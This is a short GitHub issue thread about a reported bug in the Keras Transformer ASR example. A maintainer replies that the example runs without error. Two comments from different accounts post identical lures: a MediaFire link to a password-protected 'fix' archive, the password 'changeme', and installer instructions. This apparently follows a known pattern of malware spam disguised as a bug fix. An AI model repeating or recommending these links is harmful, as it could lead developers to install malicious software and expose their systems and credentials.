### ISSUE TITLE
error in transformer asr example

### ISSUE THREAD

**Issue by zaanind** [keras-team/keras-io#1919]
### Issue Type

Bug

### Source

binary

### Keras Version

latest (on colab)

### Custom Code

Yes

### Current Behavior?

A bug happened!

### Standalone code to reproduce the issue or tutorial link

```shell
https://keras.io/examples/audio/transformer_asr/
```

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sachinprasadhs** [comment]
I was able to run the example successfully without any issue.
Here is the Gist 
[![](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.sandbox.google.com/gist/sachinprasadhs/e1be45aeaf949f815368a83f982895f2/transformer_asr.ipynb)
